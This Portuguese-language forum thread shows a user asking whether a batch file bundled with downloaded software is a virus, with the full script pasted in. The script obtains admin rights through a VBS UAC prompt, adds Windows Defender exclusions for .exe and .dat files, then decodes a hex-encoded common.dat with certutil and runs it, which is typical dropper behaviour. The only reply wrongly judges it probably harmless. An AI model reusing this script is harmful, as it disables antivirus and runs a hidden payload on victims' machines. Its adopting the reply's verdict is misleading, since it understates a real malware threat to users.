Ir ao conteúdo
Regras do Clube do Hardware

Como saber se .bat é vírus?

Gabriel616

Por Gabriel616
em Vírus, malware, invasões e afins

 Compartilhar

Posts recomendados

Gabriel616
 

Gabriel616

Postado
Postado

Olá pessoal. 

 

Baixei da internet um software que vinha com um arquivo .bat, e como sei que a extensão é muito utilizada para fazer malwares, abri o arquivo com o notepad.

 

O código é o seguinte:

 

@echo off
 CLS
 ECHO.
 ECHO ======================================
 ECHO ===Running Admin shell please wait====

:init
 setlocal DisableDelayedExpansion
 set cmdInvoke=1
 set winSysFolder=System32
 set "batchPath=%~0"
 for %%k in (%0) do set batchName=%%~nk
 set "vbsGetPrivileges=%temp%\OEgetPriv_%batchName%.vbs"
 setlocal EnableDelayedExpansion

:checkPrivileges
  NET FILE 1>NUL 2>NUL
  if '%errorlevel%' == '0' ( goto gotPrivileges ) else ( goto getPrivileges )

:getPrivileges
  if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges)
  ECHO.
  ECHO **************************************
  ECHO Invoking UAC for Privilege Escalation
  ECHO **************************************

  ECHO Set UAC = CreateObject^("Shell.Application"^) > "%vbsGetPrivileges%"
  ECHO args = "ELEV " >> "%vbsGetPrivileges%"
  ECHO For Each strArg in WScript.Arguments >> "%vbsGetPrivileges%"
  ECHO args = args ^& strArg ^& " "  >> "%vbsGetPrivileges%"
  ECHO Next >> "%vbsGetPrivileges%"

  if '%cmdInvoke%'=='1' goto InvokeCmd 

  ECHO UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%vbsGetPrivileges%"
  goto ExecElevation

:InvokeCmd
  ECHO args = "/c """ + "!batchPath!" + """ " + args >> "%vbsGetPrivileges%"
  ECHO UAC.ShellExecute "%SystemRoot%\%winSysFolder%\cmd.exe", args, "", "runas", 1 >> "%vbsGetPrivileges%"

:ExecElevation
 "%SystemRoot%\%winSysFolder%\WScript.exe" "%vbsGetPrivileges%" %*
 exit /B

:gotPrivileges
 setlocal & cd /d %~dp0
 if '%1'=='ELEV' (del "%vbsGetPrivileges%" 1>nul 2>nul  &  shift /1)

 powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExt "exe"
 powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExt "dat"

 ECHO.
 ECHO Download update..
 ping 127.0.0.1 -n 8 > nul

 certutil -decodehex -f common.dat common_tmp.dat

 start common_tmp.dat

 ECHO %batchName% Arguments: P1=%1 P2=%2 P3=%3 P4=%4 P5=%5 P6=%6 P7=%7 P8=%8 P9=%9
 cmd /k
 exit

 

O que aconteceria se eu executasse isso? Obrigado.

ricardo_br
 

ricardo_br

Postado
Postado

Batch pode tanto conter vírus ou não, como um exe pode conter vírus ou não. A vantagem que você tem  nos batch é que você pode abrir eles no notepad e analisar o código.

 

Esse batch aparentemente cria um script VBS para pedir elevação e mexe alguma coisa com certificados que não entendi mais não acredito que seja vírus, o código não é complexo suficiente para isso.

  • Obrigado 1

Crie uma conta ou entre para comentar

Você precisa ser um usuário para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar agora
 Compartilhar
Ir à lista de tópicos

Sobre o Clube do Hardware

No ar desde 1996, o Clube do Hardware é uma das maiores, mais antigas e mais respeitadas comunidades sobre tecnologia do Brasil. Leia mais

Direitos autorais

Não permitimos a cópia ou reprodução do conteúdo do nosso site, fórum, newsletters e redes sociais, mesmo citando-se a fonte. Leia mais

Mais

×
×
  • Criar novo...

LANÇAMENTO!

eletronica2025-popup.jpg


CLIQUE AQUI E BAIXE AGORA MESMO!